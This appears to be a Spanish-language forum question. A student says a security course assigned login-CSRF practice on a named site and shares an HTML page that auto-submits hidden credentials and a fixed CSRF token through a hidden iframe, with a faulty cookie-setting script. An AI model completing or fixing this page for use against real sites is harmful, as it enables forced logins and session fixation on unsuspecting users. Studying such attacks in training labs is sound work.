en mi curso de seguridad, nos dijeron que practicáramos un ataque xss con firefox en este sitio web;
http://permalink.co/
No se preocupe, este es un sitio web configurado específicamente para que practiquemos la seguridad. El campo csrf que ve debe establecerse en 1 (para la validación del token, el token es aleatorio) y el campo xss debe establecerse en 0 para esta práctica. Deberíamos escribir un archivo html e incluir otros idiomas como javascript, de modo que cuando el navegador ejecuta nuestro archivo, solo debe mostrar una página en blanco. Pero cuando se actualice, debería mostrar que hemos iniciado sesión en el sitio web que mencioné anteriormente. El nombre de usuario es 'atacante, y la contraseña es' l33th4x '.
Básicamente necesito bloquear la contraseña, el nombre de usuario y el token. Se me ocurrió un plan para usar una cookie y establecer el token en 'abc'. Entonces, cuando llego al inicio de sesión, uso el nombre de usuario y la contraseña que conozco con token = abc que configuré a sabiendas. Pero mi código no funciona, me dijeron que necesitaba dos formularios, el primero para configurar el token de cookie en 'abc' y el segundo para iniciar sesión usando los tres parámetros. Pero no veo qué poner en la primera forma. Se me ocurrió el siguiente código, pero no funciona, necesito ayuda;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title> set csrf to 0 and xss to 4 on http://permalink.co/ </title>
</head>
<body>
<iframe style="border:none;width:0px;height:0px" id="iframe_submit" name="iframe_submit"></iframe>
<form id="form_id" action="http://permalink.co/login" method="POST" target="iframe_submit">
<input type="hidden" name = "csrf_token" value="abc"><br>
<input type="hidden" name = "username" value="attacker"><br>
<input type="hidden" name = "password" value="l33th4x"><br>
</form>
<script type="text/javascript">
document.setcookie="csrf_token=abc";
document.forms["form_id"].submit();
</script>
</body>
</html>
Para una vista de primera mano de la pregunta, visite el sitio web a continuación y busque el número 2.1. Esto venció el mes pasado, pero no lo entendí y los exámenes se acercan; enlace